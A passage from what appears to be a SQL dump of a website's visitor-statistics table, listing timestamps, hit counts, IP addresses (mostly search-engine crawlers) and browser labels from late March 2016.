50.34','other'),(29169,1459343422,1,1,0,0,'66.249.89.50','other'),(29170,1459343456,1,1,0,0,'91.196.178.65','firefox'),(29171,1459343738,1,1,0,0,'141.8.142.58','other'),(29172,1459343769,1,1,0,0,'66.249.64.101','other'),(29173,1459343925,1,1,0,0,'5.9.63.149','other'),(29174,1459344276,2,0,2,0,'66.249.64.96',''),(29175,1459344359,1,1,0,0,'217.69.133.224','other'),(29176,1459344433,2,2,0,0,'141.8.183.25','other'),(29177,1459344436,1,1,0,0,'91.196.178.66','firefox'),(29178,1459344441,1,1,0,0,'141.8.132.105','other'),(29179,1459344731,1,0,1,0,'66.249.64.90',''),(29180,1459344753,1,1,0,0,'141.8.142.58','other'),(29181,1459344763,2,2,0,0,'130.193.51.19','other'),(29182,1459344797,1,0,1,0,'68.180.231.29',''),(29183,1459344888,1,1,0,0,'91.196.178.65','firefox'),(29184,1459344998,2,0,2,0,'66.249.64.106',''),(29185,1459345274,1,1,0,0,'180.76.15.10','other'),(29186,1459345373,1,0,1,0,'66.249.64.85',''),(29187,1459345475,1,1,0,0,'51.255.65.73','other'),(29188,1459345508,1,1,0,0,'217.69.133.233','other'),(29190,1459345624,1,1,0,0,'217.69.133.216','other'),(29191,1459345720,1,1,0,0,'94.179.113.199','firefox'),(29192,1459345722,1,0,1,0,'68.180.231.29',''),(29193,1459345734,1,1,0,0,'91.196.178.164','firefox'),(29194,1459345756,2,2,0,0,'141.8.183.25','other'),(29195,1459345822,1,1,0,0,'66.249.64.96','other'),(29196,1459345834,5,5,0,0,'62.210.115.133','other'),(29197,1459345876,1,1,0,0,'8.29.198.25','other'),(29198,1459346007,1,1,0,0,'151.80.31.173','other'),(29199,1459346198,1,1,0,0,'164.132.161.37','other'),(29200,1459346331,1,1,0,0,'91.196.179.69','firefox'),(29201,1459346366,2,2,0,0,'217.69.133.18','other'),(29202,1459346378,1,1,0,0,'5.255.253.113','other'),(29203,1459346555,1,1,0,0,'91.196.178.65','chrome'),(29204,1459346685,2,2,0,0,'217.69.133.220','other'),(29205,1459346687,2,2,0,0,'217.69.133.68','other'),(29206,1459346688,1,1,0,0,'217.69.133.223','other'),(29207,1459346689,1,1,0,0,'217.69.133.225','other'),(29208,1459346691,1,1,0,0,'217.69.133.222','other'),(29209,1459346700,1,0,1,0,'68.180.231.29',''),(29210,1459347194,1,1,0,0,'51.255.65.52','other'),(29211,1459347223,1,1,0,0,'93.158.152.84','other'),(29212,1459347227,1,1,0,0,'141.8.183.25','other'),(29213,1459347231,1,1,0,0,'130.193.51.83','other'),(29214,1459347318,1,1,0,0,'217.69.133.239','other'),(29215,1459347319,1,1,0,0,'217.69.133.237','other'),(29216,1459347919,1,1,0,0,'62.210.215.100','chrome'),(29217,1459347985,1,1,0,0,'217.69.133.226','other'),(29219,1459347986,1,1,0,0,'217.69.133.225','other'),(29220,1459348037,2,2,0,0,'217.69.133.228','other'),(29221,1459348038,1,1,0,0,'217.69.133.231','other'),(29222,1459348039,2,2,0,0,'217.69.133.232','other'),(29223,1459348040,1,1,0,0,'217.69.133.227','other'),(29224,1459348128,1,1,0,0,'93.158.152.84','other'),(29225,1459348132,1,1,0,0,'130.193.51.83','other'),(29226,1459348454,1,1,0,0,'51.255.65.81','other'),(29227,1459348510,2,2,0,0,'66.249.64.101','other'),(29228,1459348665,2,1,1,0,'66.249.64.106',''),(29229,1459348732,1,1,0,0,'157.55.39.165','other'),(29230,1459348983,1,1,0,0,'91.196.178.69','firefox'),(29231,1459349109,1,1,0,0,'141.8.183.25','other'),(29232,1459349433,5,0,5,0,'66.249.64.96',''),(29233,1459349918,2,2,0,0,'217.69.133.241','other'),(29234,1459349920,1,1,0,0,'217.69.133.246','other'),(29235,1459349921,1,1,0,0,'217.69.133.242','other'),(29236,1459350040,1,1,0,0,'141.8.142.58','other'),(29237,1459350050,1,1,0,0,'94.179.21.174','firefox'),(29238,1459350162,1,1,0,0,'217.69.133.222','other'),(29239,1459350406,1,0,1,0,'66.249.64.101',''),(29240,1459350418,1,1,0,0,'178.154.189.201','other'),(29241,1459350897,1,1,0,0,'130.193.51.19','other'),(29242,1459351147,1,1,0,0,'164.132.161.62','other'),(29243,1459351277,1,1,0,0,'66.249.64.96','other'),(29244,1459351381,1,1,0,0,'217.69.133.233','other'),(29245,1459351470,1,1,0,0,'217.69.133.236','other'),(29246,1459351517,1,0,1,0,'68.180.231.29',''),(29247,1459351524,1,0,1,0,'66.249.64.106',''),(29248,1459351641,1,1,0,0,'217.69.133.223','other'),(29249,1459351829,1,1,0,0,'91.202.129.190','chrome'),(29250,1459351888,1,1,0,0,'217.69.133.227','other'),(29251,1459351889,1,1,0,0,'217.69.133.229','other'),(29252,1459351890,1,1,0,0,'217.69.133.69','other'),(29253,1459351983,2,2,0,0,'66.249.64.101','other'),(29254,1459352012,1,1,0,0,'217.69.133.239','other'),(29255,1459352013,1,1,0,0,'217.69.133.240','other'),(29256,1459352042,1,1,0,0,'51.255.65.16','other'),(29257,1459352059,2,2,0,0,'217.69.133.231','other'),(29258,1459352079,1,1,0,0,'5.255.253.113','other'),(29259,1459352083,1,1,0,0,'130.193.51.83','other'),(29260,1459352087,1,1,0,0,'130.193.50.34','other'),(29261,1459352225,2,2,0,0,'217.69.133.10','other'),(29262,1459352343,1,1,0,0,'217.69.133.84','other'),(29263,1459352344,1,1,0,0,'217.69.133.219','other'),(29264,1459352725,1,1,0,0,'217.69.133.220','other'),(29265,1459352999,2,0,2,0,'66.249.64.106',''),(29266,1459353019,1,1,0,0,'217.69.133.215','other'),(29267,1459353179,2,2,0,0,'40.77.167.0','other'),(29268,1459353391,1,1,0,0,'141.0.15.6','other'),(29269,1459353466,1,1,0,0,'130.193.50.34','other'),(29270,1459353523,1,1,0,0,'51.255.65.65','other'),(29271,1459353656,2,2,0,0,'217.69.133.229','other'),(29272,1459353945,1,0,1,0,'66.249.64.106',''),(29273,1459353998,1,1,0,0,'217.69.133.220','other'),(29274,1459354132,2,1,1,0,'66.249.64.101',''),(29275,1459354292,1,0,1,0,'68.180.231.29',''),(29276,1459354397,1,1,0,0,'91.196.179.69','chrome'),(29277,1459354502,1,1,0,0,'66.249.89.52','other'),(29278,1459354541,1,1,0,0,'40.77.167.0','other'),(29279,1459354816,1,1,0,0,'141.8.183.25','other'),(29280,1459354928,1,1,0,0,'180.76.15.146','other'),(29281,1459355193,2,2,0,0,'217.69.133.215','other'),(29282,1459355194,2,2,0,0,'217.69.133.219','other'),(29283,1459355504,1,0,1,0,'66.249.64.101',''),(29284,1459355581,1,1,0,0,'217.69.133.226','other'),(29285,1459355703,1,0,1,0,'66.249.64.106',''),(29286,1459355738,4,0,4,0,'66.249.64.96',''),(29287,1459355783,1,1,0,0,'157.55.39.165','other'),(29288,1459355915,1,0,1,0,'68.180.231.29',''),(29289,1459355950,1,1,0,0,'217.69.133.218','other'),(29290,1459356006,1,0,1,0,'66.249.64.90',''),(29291,1459356253,1,1,0,0,'178.92.251.227','chrome'),(29292,1459356343,1,1,0,0,'5.255.253.113','other'),(29293,1459356347,6,6,0,0,'130.193.50.34','other'),(29294,1459356355,1,1,0,0,'141.8.183.25','other'),(29295,1459356359,2,2,0,0,'141.8.132.105','other'),(29296,1459356587,1,1,0,0,'217.69.133.230','other'),(29297,1459356588,1,1,0,0,'217.69.133.69','other'),(29298,1459356596,3,3,0,0,'217.69.133.222','other'),(29299,1459356612,1,0,1,0,'66.249.64.101',''),(29300,1459356742,1,1,0,0,'8.29.198.25','other'),(29301,1459356969,1,1,0,0,'217.69.133.225','other'),(29302,1459356973,1,1,0,0,'217.69.133.223','other'),(29303,1459357063,4,1,3,0,'66.249.64.101',''),(29304,1459357092,27,27,0,0,'176.36.80.39','other'),(29305,1459357171,3,3,0,0,'217.69.133.233','other'),(29306,1459357189,1,1,0,0,'217.69.133.67','other'),(29307,1459357271,2,1,1,0,'66.249.64.96',''),(29308,1459357376,2,2,0,0,'66.249.64.96','other'),(29309,1459357392,1,1,0,0,'217.69.133.18','other'),(29310,1459357434,3,3,0,0,'217.69.133.240','other'),(29311,1459357435,2,2,0,0,'217.69.133.237','other'),(29312,1459357520,1,1,0,0,'217.69.133.230','other'),(29313,1459357521,1,1,0,0,'217.69.133.69','other'),(29314,1459357586,1,1,0,0,'66.249.64.80','other'),(29315,1459357705,1,0,1,0,'68.180.231.29',''),(29316,1459357728,1,1,0,0,'217.69.133.85','other'),(29317,1459358051,1,1,0,0,'93.170.71.225','chrome'),(29318,1459358139,1,1,0,0,'141.8.183.25','other'),(29319,1459358190,1,1,0,0,'217.69.133.6','other'),(29320,1459358191,1,1,0,0,'217.69.133.194','other'),(29321,1459358192,1,1,0,0,'217.69.133.203','other'),(29322,1459358261,1,1,0,0,'217.69.133.238','other'),(29323,1459358329,2,2,0,0,'217.69.133.221','other'),(29324,1459358517,1,1,0,0,'217.69.133.222','other'),(29325,1459358518,1,1,0,0,'217.69.133.220','other'),(29326,1459359052,2,2,0,0,'66.249.64.101','other'),(29327,1459359121,1,1,0,0,'62.210.215.100','chrome'),(29328,1459359202,1,0,1,0,'68.180.229.103',''),(29329,1459359705,3,3,0,0,'178.154.189.202','other'),(29330,1459359792,10,9,1,0,'66.249.64.96',''),(29331,1459359796,1,1,0,0,'217.69.133.217','other'),(29332,1459359971,1,1,0,0,'95.134.185.229','other'),(29333,1459360141,1,0,1,0,'66.249.64.101',''),(29334,1459360231,1,1,0,0,'66.249.64.101','other'),(29335,1459360335,34,34,0,0,'66.249.64.96','other'),(29336,1459360668,2,2,0,0,'66.249.64.106','other'),(29337,1459360794,1,1,0,0,'217.69.133.85','other'),(29338,1459360795,1,1,0,0,'217.69.133.217','other'),(29339,1459360939,1,1,0,0,'141.0.14.150','other'),(29340,1459361450,1,1,0,0,'193.194.127.217','firefox'),(29341,1459361500,1,1,0,0,'164.132.161.42','other'),(29342,1459361615,1,0,1,0,'68.180.231.29',''),(29343,1459361639,1,1,0,0,'94.179.21.174','firefox'),(29344,1459361811,1,0,1,0,'66.249.64.101',''),(29345,1459361909,1,1,0,0,'87.206.241.168','chrome'),(29346,1459362174,1,1,0,0,'40.77.167.0','other'),(29347,1459362266,2,0,2,0,'66.249.64.96',''),(29348,1459362474,1,1,0,0,'217.69.133.240','other'),(29349,1459362475,2,2,0,0,'217.69.133.239','other'),(29350,1459362476,1,1,0,0,'217.69.133.235','other'),(29351,1459362667,1,1,0,0,'217.69.133.85','other'),(29352,1459362668,2,2,0,0,'217.69.133.84','other'),(29353,1459362694,1,1,0,0,'217.69.133.231','other'),(29354,1459362706,1,1,0,0,'217.69.133.219','other'),(29355,1459363004,1,0,1,0,'68.180.231.29',''),(29356,1459363014,1,0,1,0,'66.249.64.106',''),(29357,1459363033,1,0,1,0,'66.249.64.101',''),(29358,1459363122,1,1,0,0,'217.69.133.233','other'),(29359,1459363868,1,1,0,0,'40.77.167.0','other'),(29360,1459364035,1,1,0,0,'217.69.133.235','other'),(29361,1459364037,1,1,0,0,'217.69.133.239','other'),(29362,1459364169,1,1,0,0,'217.69.133.225','other'),(29363,1459364178,1,1,0,0,'217.69.133.229','other'),(29364,1459364666,1,0,1,0,'66.249.64.96',''),(29365,1459364679,1,1,0,0,'91.196.178.166','firefox'),(29366,1459364993,1,1,0,0,'217.69.133.232','other'),(29367,1459365158,1,0,1,0,'66.249.64.106',''),(29368,1459365195,1,0,1,0,'66.249.78.58',''),(29369,1459365215,1,1,0,0,'217.69.133.221','other'),(29370,1459365362,1,1,0,0,'66.249.89.52','other'),(29371,1459365861,1,1,0,0,'217.69.133.215','other'),(29373,1459366997,101,101,0,0,'46.4.87.105','other'),(29374,1459367088,3,3,0,0,'217.69.133.222','other'),(29375,1459367089,1,1,0,0,'217.69.133.224','other'),(29376,1459367094,1,1,0,0,'217.69.133.68','other'),(29377,1459367101,1,0,1,0,'66.249.64.106',''),(29378,1459367430,1,0,1,0,'66.249.64.85',''),(29379,1459367499,1,1,0,0,'217.69.133.194','other'),(29380,1459367500,2,2,0,0,'217.69.133.5','other'),(29381,1459367503,1,1,0,0,'217.69.133.9','other'),(29382,1459367530,4,4,0,0,'217.69.133.234','other'),(29383,1459367532,1,1,0,0,'217.69.133.70','other'),(29384,1459367575,1,0,1,0,'66.249.64.96',''),(29385,1459367591,1,1,0,0,'217.69.133.221','other'),(29386,1459367592,1,1,0,0,'217.69.133.226','other'),(29388,1459367611,4,4,0,0,'94.23.19.178','other'),(29389,1459367638,1,1,0,0,'8.29.198.26','other'),(29390,1459367775,1,1,0,0,'95.135.91.48','firefox'),(29391,1459367934,1,1,0,0,'217.69.133.233','other'),(29392,1459367935,1,1,0,0,'217.69.133.231','other'),(29393,1459368418,1,1,0,0,'217.69.133.236','other'),(29394,1459368419,1,1,0,0,'217.69.133.240','other'),(29395,1459368420,1,1,0,0,'217.69.133.235','other'),(29396,1459368610,1,0,1,0,'68.180.231.29',''),(29397,1459368691,2,2,0,0,'217.69.133.69','other'),(29398,1459368858,1,1,0,0,'217.69.133.218','other'),(29399,1459369136,3,0,3,0,'66.249.64.96',''),(29400,1459369565,1,1,0,0,'217.69.133.222','other'),(29401,1459370044,1,0,1,0,'66.249.64.106',''),(29402,1459370046,1,1,0,0,'217.69.133.228','other'),(29404,1459370183,1,0,1,0,'68.180.231.29',''),(29405,1459370185,1,1,0,0,'40.77.167.0','other'),(29406,1459370458,1,1,0,0,'217.69.133.223','other'),(29407,1459370621,1,1,0,0,'157.55.39.165','other'),(29408,1459370973,1,1,0,0,'217.69.133.68','other'),(29409,1459371255,1,1,0,0,'217.69.133.217','other'),(29410,1459371420,1,1,0,0,'217.69.133.215','other'),(29411,1459371422,1,1,0,0,'217.69.133.67','other'),(29412,1459371605,1,1,0,0,'217.69.133.222','other'),(29413,1459372210,1,1,0,0,'164.132.161.52','other'),(29414,1459372484,1,1,0,0,'213.186.114.3','chrome'),(29415,1459372485,1,1,0,0,'78.153.151.96','chrome'),(29416,1459372725,1,0,1,0,'66.249.64.233',''),(29417,1459372838,1,1,0,0,'188.0.74.65','chrome'),(29418,1459373466,1,1,0,0,'217.69.133.230','other'),(29420,1459373467,1,1,0,0,'217.69.133.228','other'),(29421,1459373783,1,0,1,0,'66.249.64.223',''),(29422,1459373840,2,2,0,0,'217.69.133.216','other'),(29423,1459373841,1,1,0,0,'217.69.133.85','other'),(29424,1459373923,2,2,0,0,'217.69.133.68','other'),(29425,1459373926,3,3,0,0,'78.46.50.246','other'),(29426,1459373944,1,1,0,0,'217.69.133.233','other'),(29427,1459373945,1,1,0,0,'217.69.133.229','other'),(29428,1459374336,2,2,0,0,'130.193.50.34','other'),(29429,1459374340,3,3,0,0,'141.8.132.105','other'),(29430,1459374490,1,1,0,0,'164.132.161.96','other'),(29431,1459374547,1,1,0,0,'217.69.133.221','other'),(29432,1459374548,1,1,0,0,'217.69.133.226','other'),(29433,1459374637,1,1,0,0,'217.69.133.219','other'),(29434,1459374649,1,0,1,0,'66.249.64.233',''),(29435,1459374740,1,0,1,0,'66.249.64.228',''),(29436,1459374927,1,1,0,0,'164.132.161.82','other'),(29437,1459375277,1,1,0,0,'217.69.133.236','other'),(29438,1459375279,1,1,0,0,'217.69.133.234','other'),(29439,1459375280,1,1,0,0,'217.69.133.240','other'),(29440,1459375397,1,1,0,0,'40.77.167.0','other'),(29441,1459375410,1,1,0,0,'217.69.133.229','other'),(29442,1459375411,1,1,0,0,'217.69.133.232','other'),(29443,1459375493,12,12,0,0,'130.193.50.34','other'),(29444,1459375497,1,1,0,0,'141.8.142.61','other'),(29445,1459375500,1,1,0,0,'130.193.51.83','other'),(29446,1459375505,3,3,0,0,'130.193.51.19','other'),(29447,1459375677,1,1,0,0,'164.132.161.66','other'),(29448,1459375722,1,1,0,0,'66.249.89.114','other'),(29449,1459375865,1,1,0,0,'217.69.133.84','other'),(29450,1459375866,1,1,0,0,'217.69.133.67','other'),(29451,1459375941,6,6,0,0,'141.8.132.105','other'),(29452,1459375946,2,2,0,0,'5.255.253.113','other'),(29453,1459376013,4,4,0,0,'141.8.183.25','other'),(29454,1459376182,2,0,2,0,'66.249.64.223',''),(29455,1459376565,1,0,1,0,'66.249.64.162',''),(29456,1459376572,1,1,0,0,'217.69.133.233','other'),(29457,1459376710,1,1,0,0,'217.69.133.68','other'),(29458,1459376763,1,0,1,0,'68.180.231.29',''),(29459,1459377103,1,1,0,0,'217.69.133.84','other'),(29460,1459377104,1,1,0,0,'217.69.133.218','other'),(29461,1459377453,1,1,0,0,'141.8.183.25','other'),(29462,1459377516,1,1,0,0,'164.132.161.38','other'),(29463,1459377564,1,1,0,0,'66.249.64.233','other'),(29464,1459377860,2,2,0,0,'141.8.132.105','other'),(29465,1459377957,1,1,0,0,'85.93.91.84','other'),(29466,1459378009,1,1,0,0,'217.69.133.221','other'),(29467,1459378010,1,1,0,0,'217.69.133.226','other'),(29468,1459378492,1,1,0,0,'8.29.198.26','other'),(29469,1459378632,4,4,0,0,'5.9.62.130','other'),(29470,1459378695,1,1,0,0,'141.8.183.25','other'),(29471,1459378704,1,1,0,0,'130.193.50.34','other'),(29472,1459379074,1,1,0,0,'217.69.133.236','other'),(29473,1459379228,1,1,0,0,'217.69.133.84','other'),(29474,1459379229,1,1,0,0,'217.69.133.217','other'),(29475,1459379230,1,1,0,0,'217.69.133.219','other'),(29476,1459379235,1,1,0,0,'141.8.142.61','other'),(29477,1459379239,1,1,0,0,'130.193.51.83','other'),(29478,1459379391,1,1,0,0,'164.132.161.80','other'),(29479,1459379395,1,1,0,0,'217.69.133.233','other'),(29480,1459379409,1,1,0,0,'151.80.31.155','other'),(29481,1459379439,2,1,1,0,'66.249.64.233',''),(29482,1459379563,1,1,0,0,'217.69.133.226','other'),(29484,1459379662,1,1,0,0,'5.255.253.113','other'),(29485,1459380251,2,2,0,0,'141.8.132.105','other'),(29486,1459380519,36,36,0,0,'82.245.71.81','other'),(29487,1459380574,2,1,1,0,'66.249.64.223',''),(29488,1459380986,1,1,0,0,'62.210.215.100','chrome'),(29489,1459380999,2,2,0,0,'217.69.133.236','other'),(29490,1459381000,1,1,0,0,'217.69.133.235','other'),(29492,1459381001,1,1,0,0,'217.69.133.237','other'),(29493,1459381040,1,1,0,0,'217.69.133.68','other'),(29494,1459381041,1,1,0,0,'217.69.133.222','other'),(29495,1459381048,1,1,0,0,'217.69.133.228','other'),(29496,1459381101,1,1,0,0,'130.193.50.34','other'),(29497,1459381105,1,1,0,0,'130.193.51.19','other'),(29498,1459381109,2,2,0,0,'5.255.253.113','other'),(29499,1459381585,1,1,0,0,'141.8.183.25','other'),(29500,1459381593,1,1,0,0,'141.8.132.105','other'),(29501,1459381922,2,0,2,0,'68.180.231.29',''),(29502,1459382036,1,0,1,0,'66.249.64.223',''),(29503,1459382180,1,1,0,0,'217.69.133.230','other'),(29504,1459382283,6,6,0,0,'130.193.50.34','other'),(29505,1459382382,2,2,0,0,'217.69.133.218','other'),(29506,1459382555,1,1,0,0,'51.255.65.73','other'),(29507,1459382670,1,1,0,0,'66.249.64.156','other'),(29508,1459382692,1,1,0,0,'151.80.31.170','other'),(29509,1459382956,1,1,0,0,'51.255.65.36','other'),(29510,1459383053,1,1,0,0,'217.69.133.68','other'),(29511,1459383297,1,1,0,0,'66.249.64.96','other'),(29512,1459383394,1,1,0,0,'40.77.167.0','other'),(29513,1459383410,1,1,0,0,'66.249.64.233','other'),(29514,1459383577,1,1,0,0,'141.8.142.58','other'),(29515,1459384103,1,1,0,0,'141.8.183.25','other'),(29516,1459384107,1,1,0,0,'130.193.50.34','other'),(29517,1459384473,1,1,0,0,'217.69.133.238','other'),(29518,1459384474,2,2,0,0,'217.69.133.235','other'),(29520,1459384566,2,0,2,0,'68.180.231.29',''),(29521,1459384661,1,1,0,0,'5.255.253.113','other'),(29522,1459384833,1,1,0,0,'40.77.167.26','other'),(29523,1459384898,2,2,0,0,'217.69.133.215','other'),(29524,1459384901,1,1,0,0,'217.69.133.219','other'),(29526,1459385068,1,1,0,0,'217.69.133.233','other'),(29527,1459385222,1,1,0,0,'217.69.133.226','other'),(29529,1459385223,1,1,0,0,'217.69.133.224','other'),(29530,1459385387,3,3,0,0,'130.193.50.34','other'),(29531,1459385719,1,1,0,0,'217.69.133.232','other'),(29532,1459385720,2,2,0,0,'217.69.133.227','other'),(29533,1459385885,2,0,2,0,'68.180.231.29',''),(29534,1459385898,234,234,0,0,'51.254.143.241','other'),(29535,1459385907,2,2,0,0,'141.8.183.25','other'),(29536,1459385915,1,1,0,0,'141.8.132.105','other'),(29537,1459385932,1,1,0,0,'130.193.51.19','other'),(29538,1459386036,1,1,0,0,'217.69.133.219','other'),(29539,1459386037,1,1,0,0,'217.69.133.217','other'),(29541,1459386038,1,1,0,0,'217.69.133.67','other'),(29542,1459386377,1,1,0,0,'217.69.133.4','other'),(29543,1459386378,1,1,0,0,'217.69.133.5','other'),(29544,1459386477,1,1,0,0,'217.69.133.231','other'),(29545,1459386481,3,3,0,0,'217.69.133.70','other'),(29546,1459386636,1,1,0,0,'217.69.133.220','other'),(29547,1459386637,1,1,0,0,'217.69.133.221','other'),(29548,1459386638,2,2,0,0,'217.69.133.223','other'),(29549,1459386662,1,0,1,0,'66.249.64.150',''),(29550,1459386671,1,1,0,0,'51.255.65.2','other'),(29551,1459386801,66,66,0,0,'51.254.143.241','other'),(29552,1459386812,1,1,0,0,'217.69.133.68','other'),(29553,1459386814,1,1,0,0,'217.69.133.224','other'),(29554,1459386935,1,1,0,0,'5.255.253.113','other'),(29555,1459387021,1,1,0,0,'66.249.89.50','other'),(29556,1459387357,15,15,0,0,'51.254.129.91','other'),(29557,1459387706,1,1,0,0,'141.8.142.58','other'),(29558,1459387724,1,1,0,0,'141.8.183.25','other'),(29559,1459388153,1,0,1,0,'66.249.64.233',''),(29560,1459388160,1,1,0,0,'217.69.133.216','other'),(29561,1459388162,1,1,0,0,'217.69.133.218','other'),(29562,1459388833,1,1,0,0,'130.193.51.83','other'),(29563,1459388837,2,2,0,0,'130.193.50.34','other'),(29564,1459388899,1,1,0,0,'217.69.133.217','other'),(29565,1459388900,1,1,0,0,'217.69.133.84','other'),(29566,1459389030,1,1,0,0,'66.249.64.162','other'),(29567,1459389317,1,1,0,0,'8.29.198.25','other'),(29568,1459389467,1,1,0,0,'217.69.133.220','other'),(29569,1459389468,1,1,0,0,'217.69.133.224','other'),(29570,1459389469,1,1,0,0,'217.69.133.226','other'),(29571,1459389986,16,16,0,0,'130.193.50.34','other'),(29572,1459389990,3,3,0,0,'141.8.183.25','other'),(29573,1459389995,4,4,0,0,'141.8.132.105','other'),(29574,1459390157,1,1,0,0,'40.77.167.0','other'),(29575,1459390553,1,1,0,0,'51.255.65.79','other'),(29576,1459390687,2,2,0,0,'217.69.133.228','other'),(29577,1459390688,1,1,0,0,'217.69.133.232','other'),(29578,1459390780,2,2,0,0,'109.173.125.227','chrome'),(29579,1459390806,1,1,0,0,'217.69.133.217','other'),(29580,1459390873,1,1,0,0,'217.69.133.225','other'),(29581,1459390874,1,1,0,0,'217.69.133.222','other'),(29582,1459390901,1,1,0,0,'46.4.123.172','other'),(29583,1459390940,2,2,0,0,'217.69.133.85','other'),(29584,1459390942,1,1,0,0,'217.69.133.215','other'),(29585,1459391143,1,1,0,0,'217.69.133.235','other'),(29586,1459391211,1,0,1,0,'66.249.64.223',''),(29587,1459391296,2,0,2,0,'68.180.231.29',''),(29588,1459391605,1,1,0,0,'217.69.133.220','other'),(29589,1459391977,1,1,0,0,'217.69.133.239','other'),(29590,1459391979,1,1,0,0,'217.69.133.236','other'),(29591,1459392152,1,1,0,0,'217.69.133.68','other'),(29592,1459392153,2,2,0,0,'217.69.133.226','other'),(29593,1459392317,1,1,0,0,'217.69.133.223','other'),(29594,1459392458,1,1,0,0,'151.80.31.163','other'),(29595,1459392646,1,0,1,0,'68.180.231.29',''),(29596,1459392890,1,1,0,0,'164.132.161.49','other'),(29597,1459392911,1,1,0,0,'217.69.133.217','other'),(29598,1459392912,1,1,0,0,'217.69.133.67','other'),(29599,1459392931,1,1,0,0,'51.255.65.2','other'),(29600,1459393167,1,1,0,0,'178.154.189.202','other'),(29601,1459393184,2,0,2,0,'66.249.64.228',''),(29602,1459393192,1,1,0,0,'217.69.133.228','other'),(29603,1459393200,1,1,0,0,'217.69.133.233','other'),(29604,1459393250,1,1,0,0,'217.69.143.70','other'),(29605,1459393396,3,3,0,0,'130.193.50.34','other'),(29606,1459393437,1,1,0,0,'66.249.64.156','other'),(29607,1459393491,1,1,0,0,'157.55.39.244','other'),(29608,1459393506,1,1,0,0,'157.55.39.165','other'),(29609,1459393508,2,2,0,0,'40.77.167.35','other'),(29610,1459393757,2,2,0,0,'66.249.64.233','other'),(29611,1459393758,1,1,0,0,'178.154.189.203','other'),(29612,1459393824,1,1,0,0,'217.69.133.223','other'),(29613,1459393825,2,2,0,0,'217.69.133.225','other'),(29614,1459393880,2,2,0,0,'66.249.64.228','other'),(29615,1459393889,1,1,0,0,'93.158.152.202','other'),(29616,1459393910,1,1,0,0,'164.132.161.35','other'),(29617,1459393917,1,1,0,0,'51.255.65.20','other'),(29618,1459394489,1,1,0,0,'62.210.215.100','chrome'),(29619,1459394680,1,1,0,0,'40.77.167.35','other'),(29620,1459394717,1,1,0,0,'66.249.64.233','other'),(29621,1459394931,2,2,0,0,'141.8.132.105','other'),(29623,1459394940,2,2,0,0,'141.8.183.25','other'),(29624,1459394945,1,1,0,0,'141.8.142.58','other'),(29625,1459394949,1,1,0,0,'130.193.51.19','other'),(29626,1459394958,1,1,0,0,'130.193.50.34','other'),(29627,1459394962,1,1,0,0,'5.255.253.68','other'),(29628,1459394966,1,1,0,0,'130.193.50.6','other'),(29629,1459394971,1,1,0,0,'178.154.189.31','other'),(29630,1459394975,1,1,0,0,'130.193.50.38','other'),(29631,1459394979,1,1,0,0,'141.8.142.61','other'),(29632,1459395229,1,1,0,0,'164.132.161.71','other'),(29633,1459395553,2,2,0,0,'217.69.133.217','other'),(29634,1459395790,1,1,0,0,'217.69.133.222','other'),(29635,1459395791,1,1,0,0,'217.69.133.223','other'),(29636,1459396028,6,6,0,0,'141.8.132.105','other'),(29637,1459396041,3,3,0,0,'217.69.133.232','other'),(29638,1459396042,1,1,0,0,'217.69.133.228','other'),(29639,1459396043,1,1,0,0,'217.69.133.230','other'),(29640,1459396284,5,5,0,0,'141.8.183.25','other'),(29641,1459396384,1,1,0,0,'66.249.89.114','other'),(29642,1459396805,2,2,0,0,'5.255.253.113','other'),(29643,1459396810,17,17,0,0,'130.193.50.34','other'),(29644,1459396923,1,1,0,0,'130.193.51.19','other'),(29645,1459396950,2,2,0,0,'217.69.133.237','other'),(29646,1459396951,2,2,0,0,'217.69.133.239','other'),(29647,1459396952,1,1,0,0,'217.69.133.240','other'),(29648,1459397257,1,1,0,0,'164.132.161.66','other'),(29649,1459397698,1,1,0,0,'217.69.133.226','other'),(29650,1459397895,1,1,0,0,'217.69.133.227','other'),(29651,1459397911,3,3,0,0,'217.69.133.69','other'),(29652,1459398018,1,0,1,0,'66.249.64.223',''),(29653,1459398419,2,2,0,0,'217.69.133.85','other'),(29654,1459398420,1,1,0,0,'217.69.133.84','other'),(29655,1459398796,1,1,0,0,'164.132.161.28','other'),(29656,1459398802,1,1,0,0,'217.69.133.227','other'),(29657,1459398803,1,1,0,0,'217.69.133.231','other'),(29658,1459399000,1,0,1,0,'66.249.64.162',''),(29659,1459399365,3,0,3,0,'66.249.64.228',''),(29660,1459399421,4,0,4,0,'66.249.64.223',''),(29661,1459399422,1,1,0,0,'51.255.65.51','other'),(29662,1459399504,118,118,0,0,'91.121.169.194','other'),(29663,1459399517,1,0,1,0,'66.249.64.156',''),(29664,1459399710,1,1,0,0,'217.69.133.217','other'),(29665,1459399711,1,1,0,0,'217.69.133.84','other'),(29666,1459399780,1,1,0,0,'164.132.161.85','other'),(29667,1459399943,1,1,0,0,'217.69.133.15','other'),(29668,1459399944,1,1,0,0,'217.69.133.18','other'),(29669,1459399945,1,1,0,0,'217.69.133.14','other'),(29670,1459400053,1,1,0,0,'151.80.31.155','other'),(29671,1459400163,1,1,0,0,'8.29.198.25','other'),(29672,1459400327,1,1,0,0,'217.69.143.55','other'),(29673,1459400414,70,70,0,0,'91.121.169.194','other'),(29674,1459400512,1,1,0,0,'178.94.172.187','chrome'),(29675,1459400687,1,0,1,0,'68.180.231.29',''),(29676,1459400729,1,0,1,0,'66.249.64.228',''),(29677,1459400812,1,1,0,0,'217.69.133.223','other'),(29678,1459401035,1,1,0,0,'217.69.133.220','other'),(29679,1459401036,1,1,0,0,'217.69.133.68','other'),(29680,1459401037,1,1,0,0,'217.69.133.224','other'),(29681,1459401482,1,1,0,0,'46.211.112.193','chrome'),(29682,1459401503,1,1,0,0,'51.255.65.50','other'),(29683,1459401518,1,0,1,0,'66.249.64.233',''),(29684,1459401539,1,1,0,0,'91.196.178.66','firefox'),(29685,1459401565,1,0,1,0,'66.249.64.223',''),(29686,1459401667,1,0,1,0,'68.180.231.29',''),(29687,1459401728,2,2,0,0,'217.69.133.215','other'),(29688,1459401770,2,2,0,0,'217.69.133.235','other'),(29689,1459401771,1,1,0,0,'217.69.133.239','other'),(29691,1459401789,1,0,1,0,'68.180.229.103',''),(29692,1459401830,1,1,0,0,'217.69.133.218','other'),(29693,1459402173,1,1,0,0,'217.69.133.229','other'),(29694,1459402174,1,1,0,0,'217.69.133.227','other'),(29695,1459402175,1,1,0,0,'217.69.133.230','other'),(29696,1459402519,1,1,0,0,'180.76.15.147','other'),(29697,1459402581,1,1,0,0,'91.196.178.68','firefox'),(29698,1459402617,1,0,1,0,'66.249.64.233',''),(29699,1459402636,1,0,1,0,'66.249.64.223',''),(29700,1459402667,2,1,1,0